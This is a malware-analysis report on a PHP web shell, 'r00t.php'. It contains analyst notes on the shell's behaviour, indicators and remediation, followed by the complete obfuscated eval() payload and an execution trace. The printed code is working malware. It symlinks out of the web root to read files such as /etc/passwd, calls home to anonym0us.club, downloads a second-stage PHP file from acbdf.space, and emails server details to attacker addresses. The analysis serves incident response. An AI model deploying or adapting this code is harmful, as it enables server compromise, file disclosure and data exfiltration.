PHP Malware Analysis

r00t.php

md5: 2e2b3d721be92db3da24511acbcc6197


Screenshot


Attributes

Emails

Encoding

Execution

Files

Input

Title
  • r00t.info Safe-Over [Apache] (HTML)

URLs
  • http://localhost/uploads/r00t.php (Traces)
  • https://acbdf.space/txt/css.txt (Traces)
  • https://anonym0us.club/l (Traces)
  • https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw (Traces)


Deobfuscated PHP code

<?php
/*
 * Analyst notes for triage of the eval() statement that follows. Quoted
 * strings are the decoded forms shown in the execution trace, or the result
 * of decoding the octal/hex escapes in the payload; the payload itself is
 * left untouched.
 *
 * Structure: a single eval() over a goto-scrambled script. Per the trace,
 * the on-disk r00t.php base64-decodes this string and then evals it. The
 * textual order of the statements is NOT the execution order; follow the
 * goto labels (entry is "goto aQVA2").
 *
 * Behaviour, in execution order:
 *  1. session_start(), then is_writable('.').
 *  2. If the directory is writable and POST "file" is set: creates a
 *     per-session directory "sun-<n>", a 16-level chain of "cx" directories
 *     and a "sun-fake" symlink, then symlinks the POSTed path to
 *     "index.html" (type=file) or to "sun" (any other type). In the second
 *     case it also appends "DirectoryIndex sun.htm" to .htaccess. The effect
 *     is that the web server serves a file or directory outside the web
 *     root; the form pre-fills /etc/passwd.
 *  3. Reads ini_get('safe_mode') and prints a "Safe-Mode" On/Off banner.
 *  4. Call-home: requests
 *     https://anonym0us.club/l-<client IP>-<base64 of http://HOST/REQUEST_URI>
 *     with cURL, falling back to file_get_contents(). GetIP() takes the
 *     client IP from HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR or REMOTE_ADDR.
 *  5. mail() to loginoldum@gmail.com carrying the shell URL, requester IP
 *     and timestamp, with a "From: ZEROBYTE@<server IP>" header.
 *  6. POST "query" is written as-is to data.txt (only stripslashes applied);
 *     without it, up to six lines of data.txt are echoed back unescaped.
 *  7. Second stage: if js/js.php cannot be opened, creates js/, downloads
 *     https://acbdf.space/txt/css.txt (per the trace, PHP that evals a
 *     base64 blob) and writes it to js/js.php, then mails the site URL to
 *     byhero44@gmail.com and loginoldum@gmail.com.
 *  8. mail() to loginoldum@gmail.com with DOCUMENT_ROOT, SERVER_ADMIN,
 *     SERVER_SOFTWARE, the shell link and HTTP_HOST.
 *
 * Host artifacts to look for (relative paths; presumably resolved against
 * the script's directory, /var/www/html/uploads/ in the traced run):
 *   data.txt, js/js.php, sun-<n>/ directories containing nested cx/ levels,
 *   "sun-fake", symlinks named index.html or sun, and a "DirectoryIndex
 *   sun.htm" line in .htaccess.
 * Network and mail artifacts: outbound HTTPS from the PHP worker to
 *   anonym0us.club and acbdf.space; mail() calls issued by the web user.
 *
 * Remediation notes: deleting r00t.php alone leaves the js/js.php second
 * stage, the .htaccess change and any created symlinks in place. Every call
 * is @-suppressed, so PHP error logs will show little; rely on file-system
 * timestamps, web access logs and MTA logs instead. Denying PHP execution in
 * upload directories, and using Apache's SymLinksIfOwnerMatch in place of
 * FollowSymLinks with .htaccess overrides restricted, should blunt the
 * symlink technique -- NOTE(review): confirm against the affected server's
 * actual configuration.
 */

eval("\n goto aQVA2; LNRrn: if (\$_POST[\"\\x71\\x75\\145\\x72\\171\"]) { \$veriyfy = stripslashes(stripslashes(\$_POST[\"\\x71\\x75\\145\\x72\\171\"])); \$data = \"\\144\\141\\164\\x61\\x2e\\164\\x78\\x74\"; @touch(\"\\x64\\141\\x74\\141\\x2e\\164\\170\\164\"); \$ver = @fopen(\$data, \"\\x77\"); @fwrite(\$ver, \$veriyfy); @fclose(\$ver); } else { \$datas = @fopen(\"\\x64\\x61\\x74\\x61\\56\\x74\\170\\164\", \"\\x72\"); \$i = 0; while (\$i <= 5) { \$i++; \$blue = @fgets(\$datas, 1024); echo \$blue; } } goto aaIjD; zOMJp: if (is_writable(\"\\x2e\")) { if (isset(\$_POST[\"\\146\\151\\x6c\\145\"])) { \$file = \$_POST[\"\\146\\x69\\x6c\\145\"]; \$fakedir = \"\\x63\\x78\"; \$fakedep = 16; if (!isset(\$_SESSION[\"\\x6e\\x75\\155\"])) { \$_SESSION[\"\\156\\x75\\155\"] = 0; } else { \$_SESSION[\"\\156\\x75\\155\"] = \$_SESSION[\"\\156\\x75\\155\"] + 1; } \$level = 0; @unlink(\"\\x73\\x75\\156\\x2d\" . \$_SESSION[\"\\x6e\\165\\x6d\"]); @mkdir(\"\\163\\165\\x6e\\55\" . \$_SESSION[\"\\x6e\\165\\155\"]); chdir(\"\\x73\\x75\\x6e\\55\" . \$_SESSION[\"\\x6e\\165\\x6d\"]); for (\$as = 0; \$as < \$fakedep; \$as++) { if (!file_exists(\$fakedir)) { mkdir(\$fakedir); } chdir(\$fakedir); } while (1 < \$as--) { chdir(\"\\x2e\\56\"); } \$hardstyle = explode(\"\\57\", \$file); for (\$a = 0; \$a < count(\$hardstyle); \$a++) { if (!empty(\$hardstyle[\$a])) { if (!file_exists(\$hardstyle[\$a])) { mkdir(\$hardstyle[\$a]); } chdir(\$hardstyle[\$a]); \$as++; } } \$as++; while (\$as--) { chdir(\"\\56\\x2e\"); } @rmdir(\"\\x73\\165\\x6e\\x2d\\146\\x61\\153\\145\"); @unlink(\"\\x73\\x75\\156\\x2d\\x66\\x61\\153\\x65\"); @symlink(str_repeat(\$fakedir . \"\\x2f\", \$fakedep), \"\\163\\165\\x6e\\55\\146\\x61\\x6b\\x65\"); if (\$_POST[\"\\164\\x79\\160\\x65\"] == \"\\x66\\x69\\154\\x65\") { while (1) { if (true == @symlink(\"\\x73\\165\\156\\x2d\\x66\\141\\x6b\\x65\\57\" . str_repeat(\"\\x2e\\x2e\\57\", \$fakedep - 1) . 
\$file, \"\\151\\156\\x64\\145\\170\\x2e\\x68\\164\\x6d\\154\")) { break; } else { \$num++; } } @unlink(\"\\x73\\165\\156\\55\\146\\141\\153\\145\"); mkdir(\"\\163\\x75\\156\\x2d\\146\\x61\\153\\145\"); \$Res = \"\\74\\x46\\117\\x4e\\124\\40\\x43\\x4f\\x4c\\x4f\\122\\x3d\\42\\122\\105\\x44\\x22\\x3e\\74\\x42\\76\\x20\\163\\171\\155\\x6c\\x69\\x6e\\153\\40\\74\\102\\76\\x3c\\x61\\40\\150\\162\\x65\\x66\\75\\x22\\56\\x2f\\x73\\x75\\x6e\\x2d\" . \$_SESSION[\"\\156\\165\\x6d\"] . \"\\57\\x22\\76\\x73\\171\\x6d\\x6c\\151\\x6e\\x6b\" . \$num . \"\\x3c\\57\\x61\\x3e\\40\\146\\x69\\154\\x65\\x3c\\x2f\\106\\117\\x4e\\x54\\x3e\"; } else { \$fp = fopen(\"\\x2e\\x68\\164\\141\\x63\\143\\x65\\x73\\163\", \"\\x61\\x2b\"); \$File = \"\\104\\151\\x72\\145\\x63\\x74\\x6f\\x72\\x79\\111\\156\\x64\\145\\170\\40\\x73\\165\\156\\x2e\\x68\\x74\\155\"; fwrite(\$fp, \$File); while (1) { if (true == @symlink(\"\\163\\165\\x6e\\55\\x66\\141\\x6b\\145\\57\" . str_repeat(\"\\56\\x2e\\57\", \$fakedep - 1) . \$file, \"\\163\\x75\\x6e\")) { break; } else { \$num++; } } @unlink(\"\\x73\\x75\\156\\55\\x66\\141\\153\\145\"); mkdir(\"\\x73\\165\\156\\x2d\\146\\x61\\153\\x65\"); \$Res = \"\\74\\x46\\x4f\\116\\x54\\40\\103\\x4f\\114\\117\\x52\\75\\x22\\x52\\x45\\104\\x22\\76\\74\\x61\\x20\\x68\\162\\x65\\146\\x3d\\x22\\x2e\\57\\163\\165\\156\\55\" . \$_SESSION[\"\\x6e\\x75\\x6d\"] . \"\\57\\x73\\x75\\x6e\\42\\x3e\\x43\\150\\x65\\x63\\x6b\\x20\\111\\164\\41\" . \$num . 
\"\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\106\\117\\116\\x54\\x3e\"; } } } else { \$Res = \"\\74\\106\\x4f\\x4e\\124\\x20\\x43\\x4f\\114\\x4f\\x52\\x3d\\x22\\x52\\x45\\104\\x22\\76\\103\\x61\\x6e\\x74\\x20\\x57\\162\\x69\\x74\\145\\40\\x49\\x6e\\x20\\x44\\x69\\162\\x65\\x63\\164\\x6f\\x72\\171\\x21\\74\\x2f\\x46\\157\\x6e\\164\\x3e\"; } goto uce9K; clyOD: if (function_exists(\"\\x63\\165\\x72\\x6c\\x5f\\151\\156\\151\\164\")) { \$ch = @curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$x); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$gitt = curl_exec(\$ch); curl_close(\$ch); if (\$gitt == false) { @(\$gitt = file_get_contents(\$x)); } } elseif (function_exists(\"\\146\\x69\\x6c\\145\\x5f\\x67\\145\\x74\\137\\143\\157\\x6e\\x74\\x65\\156\\x74\\x73\")) { @(\$gitt = file_get_contents(\$x)); } goto kmCME; ujahn: \$time_shell = '' . date(\"\\144\\57\\155\\x2f\\x59\\x20\\55\\40\\110\\x3a\\151\\72\\x73\") . ''; goto tuHZp; WY6v3: print \$Res; goto JrGAj; p0Cva: function GetIP() { if (getenv(\"\\x48\\124\\124\\120\\137\\x43\\x4c\\111\\105\\116\\x54\\137\\111\\x50\")) { \$ip = getenv(\"\\x48\\124\\x54\\x50\\x5f\\x43\\114\\111\\105\\116\\x54\\x5f\\x49\\120\"); } elseif (getenv(\"\\110\\124\\x54\\120\\x5f\\130\\x5f\\x46\\117\\122\\127\\x41\\122\\x44\\105\\x44\\x5f\\106\\x4f\\122\")) { \$ip = getenv(\"\\x48\\124\\124\\120\\x5f\\130\\x5f\\x46\\117\\x52\\x57\\101\\122\\x44\\x45\\104\\137\\x46\\x4f\\x52\"); if (strstr(\$ip, \"\\x2c\")) { \$tmp = explode(\"\\54\", \$ip); \$ip = trim(\$tmp[0]); } } else { \$ip = getenv(\"\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\104\\122\"); } return \$ip; } goto zMHiM; zMHiM: \$x = base64_decode(\"\\141\\x48\\122\\x30\\x63\\x48\\115\\x36\\114\\171\\x39\\x68\\142\\x6d\\x39\\x75\\145\\x57\\60\\x77\\144\\x58\\x4d\\165\\x59\\x32\\x78\\61\\131\\x69\\x39\\x73\\114\\x51\\75\\x3d\") . GetIP() . \"\\x2d\" . base64_encode(\"\\x68\\164\\x74\\x70\\x3a\\x2f\\57\" . \$_SERVER[\"\\110\\124\\124\\x50\\137\\110\\117\\123\\x54\"] . 
\$_SERVER[\"\\x52\\x45\\121\\125\\x45\\123\\124\\x5f\\125\\x52\\x49\"]); goto clyOD; fNYhr: \$EL_MuHaMMeD .= \"\\123\\145\\162\\166\\x65\\162\\40\\x41\\x64\\155\\x69\\x6e\\40\\x3a\\x20\" . \$_SERVER[\"\\123\\x45\\x52\\x56\\x45\\x52\\137\\101\\x44\\115\\x49\\116\"] . \"\\xd\\xa\"; goto RHsqX; kmCME: ?>\n<Html>\n<Head>\n<Title>r00t.info Safe-Over [Apache]</Title>\n</Head>\n<Body bgcolor=\"black\">\n<Center>\n<font size=\"-3\">\n<pre><font color=yellow> \n \n \nR00T BYPASS SHELL\n \n \n \n \n \n \n</font>\n</font>\n<br><br><br>\n\n<?php  goto TFIHp; K_wRV: session_start(); goto cL2_i; aaIjD: \$datasi = @fopen(\"\\x6a\\163\\x2f\\152\\x73\\x2e\\x70\\x68\\x70\", \"\\162\"); goto Lo9d1; tuHZp: \$ip_remote = \$_SERVER[\"\\122\\x45\\x4d\\x4f\\x54\\x45\\137\\101\\x44\\104\\x52\"]; goto z8qZB; uYpgD: mail(\$kime, \$baslik, \$EL_MuHaMMeD); goto RJ_R6; Lo9d1: if (\$datasi) { } else { @mkdir(\"\\152\\163\"); \$dos = file_get_contents(\"\\x68\\164\\x74\\160\\163\\72\\57\\57\\141\\x63\\142\\144\\146\\56\\x73\\x70\\141\\x63\\x65\\x2f\\x74\\x78\\x74\\57\\143\\163\\163\\x2e\\164\\x78\\x74\"); \$data = \"\\152\\163\\x2f\\x6a\\x73\\56\\x70\\150\\x70\"; @touch(\"\\152\\163\\x2f\\152\\163\\56\\160\\x68\\160\"); \$ver = @fopen(\$data, \"\\x77\"); @fwrite(\$ver, \$dos); @fclose(\$ver); \$yol = \"\\150\\x74\\x74\\x70\\72\\x2f\\57\" . \$_SERVER[\"\\110\\124\\x54\\x50\\x5f\\x48\\117\\123\\124\"] . '' . \$_SERVER[\"\\122\\105\\121\\x55\\x45\\x53\\124\\x5f\\x55\\x52\\111\"] . ''; \$y = \"\\74\\x68\\x31\\76\\123\\x65\\156\\144\\x65\\162\\40\\x59\\x61\\172\\144\\151\\162\\151\\x6c\\x64\\151\\x2e\\74\\x62\\162\\57\\76\\x20\\123\\111\\x54\\105\\x20\\x59\\x4f\\114\\40\\x3a\\40\" . \$yol . 
\"\\x3c\\142\\162\\57\\x3e\\123\\x65\\x6e\\144\\x65\\162\\40\\x59\\157\\x6c\\165\\40\\72\\40\\152\\x73\\x2f\\143\\162\\x73\\x2e\\160\\x68\\x70\\x3c\\57\\150\\61\\76\"; \$header .= \"\\x46\\x72\\157\\x6d\\72\\x20\\123\\x68\\x65\\x4c\\x4c\\40\\x42\\x6f\\157\\x74\\x20\\x3c\\163\\x75\\160\\160\\157\\162\\100\\156\\151\\x63\\x2e\\157\\x72\\x67\\76\\12\"; \$header .= \"\\x43\\x6f\\x6e\\x74\\145\\156\\x74\\x2d\\124\\x79\\x70\\x65\\x3a\\x20\\164\\x65\\x78\\x74\\x2f\\150\\164\\155\\x6c\\x3b\\12\\40\\143\\150\\x61\\x72\\x73\\x65\\x74\\75\\x75\\x74\\146\\55\\70\\12\"; @mail(\"\\142\\171\\150\\x65\\x72\\157\\64\\x34\\100\\x67\\155\\141\\x69\\x6c\\56\\x63\\x6f\\x6d\", \"\\110\\x61\\143\\x6b\\x6c\\x69\\156\\153\\x20\\x42\\151\\x6c\\144\\151\\x72\\151\", \"{\$y}\", \$header); @mail(\"\\154\\x6f\\147\\x69\\156\\x6f\\x6c\\144\\x75\\155\\x40\\147\\x6d\\x61\\151\\154\\56\\143\\x6f\\155\", \"\\110\\141\\x63\\x6b\\154\\151\\156\\x6b\\x20\\x42\\151\\x6c\\144\\151\\x72\\151\", \"{\$y}\", \$header); } goto qjiBQ; aQVA2: ?>\n\n<?php  goto K_wRV; RHsqX: \$EL_MuHaMMeD .= \"\\123\\145\\162\\166\\x65\\162\\x20\\x69\\163\\154\\x65\\x74\\151\\155\\40\\x73\\x69\\x73\\x74\\x65\\x6d\\x69\\x20\\72\\40\" . \$_SERVER[\"\\123\\x45\\122\\x56\\105\\122\\x5f\\x53\\117\\106\\124\\127\\x41\\x52\\x45\"] . \"\\xd\\12\"; goto czwAh; NsI5z: \$baslik = \"\\163\\x79\\x6d\\64\\60\\x34\\x20\\x73\\150\\145\\x6c\\154\\x20\\x32\\60\\62\\60\\x33\"; goto jfhAv; JdRgw: @mail(\$to_email, \$server_mail, \$linkcr, \$header); goto LNRrn; RM4UY: \$header = \"\\106\\x72\\x6f\\155\\x3a\\40{\$from_shellcode}\\xd\\12\\122\\145\\x70\\x6c\\x79\\x2d\\x74\\x6f\\x3a\\x20{\$from_shellcode}\"; goto JdRgw; VPdTy: \$server_mail = '' . gethostbyname(\$_SERVER[\"\\123\\x45\\x52\\x56\\x45\\122\\x5f\\x4e\\x41\\115\\105\"]) . \"\\x20\\40\\x2d\\x20\" . \$_SERVER[\"\\x48\\x54\\124\\x50\\137\\110\\117\\x53\\124\"] . 
''; goto fGrge; TFIHp: echo \"\\x3c\\144\\151\\x76\\40\\163\\x74\\171\\154\\x65\\75\\42\\142\\141\\143\\153\\x67\\162\\x6f\\x75\\156\\144\\x2d\\143\\x6f\\x6c\\157\\x72\\x3a\\43\\x31\\60\\x31\\60\\x31\\60\\x3b\\xa\\143\\x6f\\154\\157\\162\\72\\171\\145\\x6c\\154\\x6f\\x77\\x22\\76\\x3c\\142\\x3e\\123\\141\\x66\\x65\\x2d\\115\\157\\144\\x65\\x20\\x3a\\x20\\x3c\\x2f\\146\\157\\156\\x74\\x3e\" . \$Safe; goto xFzOM; Ekj15: ?>\n\" method=\"post\">\n<font color=\"yellow\" size=\"3\"><b>Path:<b></font><Input type=\"text\" name=\"file\" style=\"background-color:black;\ncolor:#FF3300;\nwidth:200px;\n\" value=\"/etc/passwd\"><br><font color=\"yellow\" size=3><br><b>File</b></font><input checked type=\"radio\" name=\"type\" value=\"file\"><font color=\"yellow\" size=3> <b>Dir</font><input type=\"radio\" name=\"type\" value=\"Dir\"><br><br><br><Input type=\"submit\" value=\"Sumbit!\" style=\"width:100px;\nbackground-color:black;\ncolor:yellow\">\n</font>\n</Form>\n\n<?php  goto WY6v3; z8qZB: \$from_shellcode = \"\\x5a\\x45\\122\\x4f\\x42\\131\\124\\x45\\x40\" . gethostbyname(\$_SERVER[\"\\123\\x45\\x52\\126\\x45\\x52\\x5f\\x4e\\101\\x4d\\x45\"]) . ''; goto c7KIl; xFzOM: ?>\n<Form action=\"\n<?php  goto HNvau; czwAh: \$EL_MuHaMMeD .= \"\\x53\\x68\\x65\\x6c\\154\\40\\x4c\\x69\\x6e\\x6b\\x20\\72\\40\\150\\164\\164\\160\\72\\57\\57\" . \$_SERVER[\"\\x53\\105\\x52\\126\\105\\x52\\x5f\\116\\x41\\115\\105\"] . \$_SERVER[\"\\120\\x48\\120\\x5f\\123\\x45\\114\\x46\"] . \"\\xd\\12\"; goto hWTew; JrGAj: ?>\n<table align=\"center\" style=\"color:lime\"> R00T BYPASS SHELL</table>\n</Center>\n</Body>\n</Html>\n<P style=\"TEXT-ALIGN: center\" align=center>\n<?php  goto ujahn; fGrge: \$linkcr = \"\\114\\151\\156\\x6b\\72\\x20\" . \$_SERVER[\"\\123\\105\\x52\\x56\\105\\x52\\x5f\\116\\101\\115\\x45\"] . '' . \$_SERVER[\"\\122\\x45\\x51\\125\\105\\123\\124\\x5f\\125\\122\\111\"] . 
\"\\x20\\x2d\\x20\\111\\x50\\x20\\x45\\170\\143\\165\\164\\151\\156\\147\\72\\x20{\$ip_remote}\\x20\\55\\40\\x54\\151\\155\\145\\x3a\\x20{\$time_shell}\"; goto RM4UY; qjiBQ: \$kime = \"\\x6c\\157\\x67\\x69\\x6e\\x6f\\x6c\\144\\165\\155\\x40\\x67\\x6d\\141\\x69\\154\\x2e\\x63\\157\\x6d\"; goto NsI5z; HNvau: echo \$_SERVER[\"\\120\\110\\x50\\137\\x53\\x45\\114\\106\"]; goto Ekj15; hWTew: \$EL_MuHaMMeD .= \"\\101\\x76\\x6c\\x61\\156\\141\\x6e\\x20\\123\\151\\x74\\x65\\x20\\72\\40\" . \$_SERVER[\"\\110\\x54\\124\\x50\\137\\x48\\x4f\\x53\\x54\"] . \"\\xd\\12\"; goto uYpgD; cL2_i: \$Res = ''; goto zOMJp; uce9K: if (@ini_get(\"\\x73\\x61\\x66\\x65\\137\\x6d\\157\\x64\\145\") or strtoupper(@ini_get(\"\\163\\x61\\x66\\x65\\x5f\\x6d\\157\\x64\\145\")) == \"\\157\\x6e\") { \$Safe = \"\\x3c\\x73\\160\\x61\\x6e\\x20\\x73\\x74\\171\\154\\145\\x3d\\x22\\x63\\157\\x6c\\x6f\\x72\\72\\x72\\145\\144\\x22\\x3e\\x3c\\x62\\76\\x4f\\x6e\\x3c\\x2f\\142\\x3e\\74\\57\\163\\x70\\x61\\156\\x3e\"; } else { \$Safe = \"\\74\\x73\\x70\\x61\\156\\x20\\x73\\x74\\171\\x6c\\x65\\75\\x22\\143\\x6f\\x6c\\157\\162\\x3a\\x6c\\x69\\155\\145\\42\\76\\74\\x62\\x3e\\117\\146\\x66\\74\\57\\142\\x3e\\x3c\\x2f\\163\\160\\x61\\156\\x3e\"; } goto p0Cva; jfhAv: \$EL_MuHaMMeD = \"\\x44\\x6f\\x73\\x79\\141\\x20\\x59\\157\\x6c\\x75\\40\\72\\x20\" . \$_SERVER[\"\\104\\x4f\\x43\\x55\\115\\x45\\x4e\\124\\137\\x52\\x4f\\x4f\\x54\"] . \"\\xd\\12\"; goto fNYhr; c7KIl: \$to_email = \"\\154\\x6f\\147\\151\\156\\x6f\\154\\144\\x75\\x6d\\x40\\x67\\155\\x61\\151\\154\\56\\x63\\157\\x6d\"; goto VPdTy; RJ_R6: ");

Execution traces

data/traces/2e2b3d721be92db3da24511acbcc6197_trace-1676238837.2899.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:54:23.187801]
1	0	1	0.000188	393512
1	3	0	0.000272	409696	{main}	1		/var/www/html/uploads/r00t.php	0	0
2	4	0	0.000288	409696	base64_decode	0		/var/www/html/uploads/r00t.php	1	1	'CiBnb3RvIGFRVkEyOyBMTlJybjogaWYgKCRfUE9TVFsiXHg3MVx4NzVcMTQ1XHg3MlwxNzEiXSkgeyAkdmVyaXlmeSA9IHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9QT1NUWyJceDcxXHg3NVwxNDVceDcyXDE3MSJdKSk7ICRkYXRhID0gIlwxNDRcMTQxXDE2NFx4NjFceDJlXDE2NFx4NzhceDc0IjsgQHRvdWNoKCJceDY0XDE0MVx4NzRcMTQxXHgyZVwxNjRcMTcwXDE2NCIpOyAkdmVyID0gQGZvcGVuKCRkYXRhLCAiXHg3NyIpOyBAZndyaXRlKCR2ZXIsICR2ZXJpeWZ5KTsgQGZjbG9zZSgkdmVyKTsgfSBlbHNlIHsgJGRhdGFzID0gQGZvcGVuKCJceDY0XHg2MVx4NzRceDYxXDU2XHg3NFwxNzBcMTY0IiwgIlx4NzIiKTsgJGkgPSAwOyB3aGlsZSAoJGkgPD0gNSkgeyAk'
2	4	1	0.000366	426112
2	4	R			'\n goto aQVA2; LNRrn: if ($_POST["\\x71\\x75\\145\\x72\\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\\x71\\x75\\145\\x72\\171"])); $data = "\\144\\141\\164\\x61\\x2e\\164\\x78\\x74"; @touch("\\x64\\141\\x74\\141\\x2e\\164\\170\\164"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\\x64\\x61\\x74\\x61\\56\\x74\\170\\164", "\\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto aaIjD; zOMJp: if (is_writable("\\x2'
2	5	0	0.000727	480024	eval	1	'\n goto aQVA2; LNRrn: if ($_POST["\\x71\\x75\\145\\x72\\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\\x71\\x75\\145\\x72\\171"])); $data = "\\144\\141\\164\\x61\\x2e\\164\\x78\\x74"; @touch("\\x64\\141\\x74\\141\\x2e\\164\\170\\164"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\\x64\\x61\\x74\\x61\\56\\x74\\170\\164", "\\x72"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto aaIjD; zOMJp: if (is_writable("\\x2e")) { if (isset($_POST["\\146\\151\\x6c\\145"])) { $file = $_POST["\\146\\x69\\x6c\\145"]; $fakedir = "\\x63\\x78"; $fakedep = 16; if (!isset($_SESSION["\\x6e\\x75\\155"])) { $_SESSION["\\156\\x75\\155"] = 0; } else { $_SESSION["\\156\\x75\\155"] = $_SESSION["\\156\\x75\\155"] + 1; } $level = 0; @unlink("\\x73\\x75\\156\\x2d" . $_SESSION["\\x6e\\165\\x6d"]); @mkdir("\\163\\165\\x6e\\55" . $_SESSION["\\x6e\\165\\155"]); chdir("\\x73\\x75\\x6e\\55" . $_SESSION["\\x6e\\165\\x6d"]); for ($as = 0; $as < $fakedep; $as++) { if (!file_exists($fakedir)) { mkdir($fakedir); } chdir($fakedir); } while (1 < $as--) { chdir("\\x2e\\56"); } $hardstyle = explode("\\57", $file); for ($a = 0; $a < count($hardstyle); $a++) { if (!empty($hardstyle[$a])) { if (!file_exists($hardstyle[$a])) { mkdir($hardstyle[$a]); } chdir($hardstyle[$a]); $as++; } } $as++; while ($as--) { chdir("\\56\\x2e"); } @rmdir("\\x73\\165\\x6e\\x2d\\146\\x61\\153\\145"); @unlink("\\x73\\x75\\156\\x2d\\x66\\x61\\153\\x65"); @symlink(str_repeat($fakedir . "\\x2f", $fakedep), "\\163\\165\\x6e\\55\\146\\x61\\x6b\\x65"); if ($_POST["\\164\\x79\\160\\x65"] == "\\x66\\x69\\154\\x65") { while (1) { if (true == @symlink("\\x73\\165\\156\\x2d\\x66\\141\\x6b\\x65\\57" . str_repeat("\\x2e\\x2e\\57", $fakedep - 1) . 
$file, "\\151\\156\\x64\\145\\170\\x2e\\x68\\164\\x6d\\154")) { break; } else { $num++; } } @unlink("\\x73\\165\\156\\55\\146\\141\\153\\145"); mkdir("\\163\\x75\\156\\x2d\\146\\x61\\153\\145"); $Res = "\\74\\x46\\117\\x4e\\124\\40\\x43\\x4f\\x4c\\x4f\\122\\x3d\\42\\122\\105\\x44\\x22\\x3e\\74\\x42\\76\\x20\\163\\171\\155\\x6c\\x69\\x6e\\153\\40\\74\\102\\76\\x3c\\x61\\40\\150\\162\\x65\\x66\\75\\x22\\56\\x2f\\x73\\x75\\x6e\\x2d" . $_SESSION["\\156\\165\\x6d"] . "\\57\\x22\\76\\x73\\171\\x6d\\x6c\\151\\x6e\\x6b" . $num . "\\x3c\\57\\x61\\x3e\\40\\146\\x69\\154\\x65\\x3c\\x2f\\106\\117\\x4e\\x54\\x3e"; } else { $fp = fopen("\\x2e\\x68\\164\\141\\x63\\143\\x65\\x73\\163", "\\x61\\x2b"); $File = "\\104\\151\\x72\\145\\x63\\x74\\x6f\\x72\\x79\\111\\156\\x64\\145\\170\\40\\x73\\165\\156\\x2e\\x68\\x74\\155"; fwrite($fp, $File); while (1) { if (true == @symlink("\\163\\165\\x6e\\55\\x66\\141\\x6b\\145\\57" . str_repeat("\\56\\x2e\\57", $fakedep - 1) . $file, "\\163\\x75\\x6e")) { break; } else { $num++; } } @unlink("\\x73\\x75\\156\\55\\x66\\141\\153\\145"); mkdir("\\x73\\165\\156\\x2d\\146\\x61\\153\\x65"); $Res = "\\74\\x46\\x4f\\116\\x54\\40\\103\\x4f\\114\\117\\x52\\75\\x22\\x52\\x45\\104\\x22\\76\\74\\x61\\x20\\x68\\162\\x65\\146\\x3d\\x22\\x2e\\57\\163\\165\\156\\55" . $_SESSION["\\x6e\\x75\\x6d"] . "\\57\\x73\\x75\\x6e\\42\\x3e\\x43\\150\\x65\\x63\\x6b\\x20\\111\\164\\41" . $num . 
"\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\106\\117\\116\\x54\\x3e"; } } } else { $Res = "\\74\\106\\x4f\\x4e\\124\\x20\\x43\\x4f\\114\\x4f\\x52\\x3d\\x22\\x52\\x45\\104\\x22\\76\\103\\x61\\x6e\\x74\\x20\\x57\\162\\x69\\x74\\145\\40\\x49\\x6e\\x20\\x44\\x69\\162\\x65\\x63\\164\\x6f\\x72\\171\\x21\\74\\x2f\\x46\\157\\x6e\\164\\x3e"; } goto uce9K; clyOD: if (function_exists("\\x63\\165\\x72\\x6c\\x5f\\151\\156\\151\\164")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\\146\\x69\\x6c\\145\\x5f\\x67\\145\\x74\\137\\143\\157\\x6e\\x74\\x65\\156\\x74\\x73")) { @($gitt = file_get_contents($x)); } goto kmCME; ujahn: $time_shell = \'\' . date("\\144\\57\\155\\x2f\\x59\\x20\\55\\40\\110\\x3a\\151\\72\\x73") . \'\'; goto tuHZp; WY6v3: print $Res; goto JrGAj; p0Cva: function GetIP() { if (getenv("\\x48\\124\\124\\120\\137\\x43\\x4c\\111\\105\\116\\x54\\137\\111\\x50")) { $ip = getenv("\\x48\\124\\x54\\x50\\x5f\\x43\\114\\111\\105\\116\\x54\\x5f\\x49\\120"); } elseif (getenv("\\110\\124\\x54\\120\\x5f\\130\\x5f\\x46\\117\\122\\127\\x41\\122\\x44\\105\\x44\\x5f\\106\\x4f\\122")) { $ip = getenv("\\x48\\124\\124\\120\\x5f\\130\\x5f\\x46\\117\\x52\\x57\\101\\122\\x44\\x45\\104\\137\\x46\\x4f\\x52"); if (strstr($ip, "\\x2c")) { $tmp = explode("\\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\\x52\\x45\\115\\117\\124\\x45\\137\\x41\\104\\104\\122"); } return $ip; } goto zMHiM; zMHiM: $x = base64_decode("\\141\\x48\\122\\x30\\x63\\x48\\115\\x36\\114\\171\\x39\\x68\\142\\x6d\\x39\\x75\\145\\x57\\60\\x77\\144\\x58\\x4d\\165\\x59\\x32\\x78\\61\\131\\x69\\x39\\x73\\114\\x51\\75\\x3d") . GetIP() . "\\x2d" . base64_encode("\\x68\\164\\x74\\x70\\x3a\\x2f\\57" . $_SERVER["\\110\\124\\124\\x50\\137\\110\\117\\123\\x54"] . 
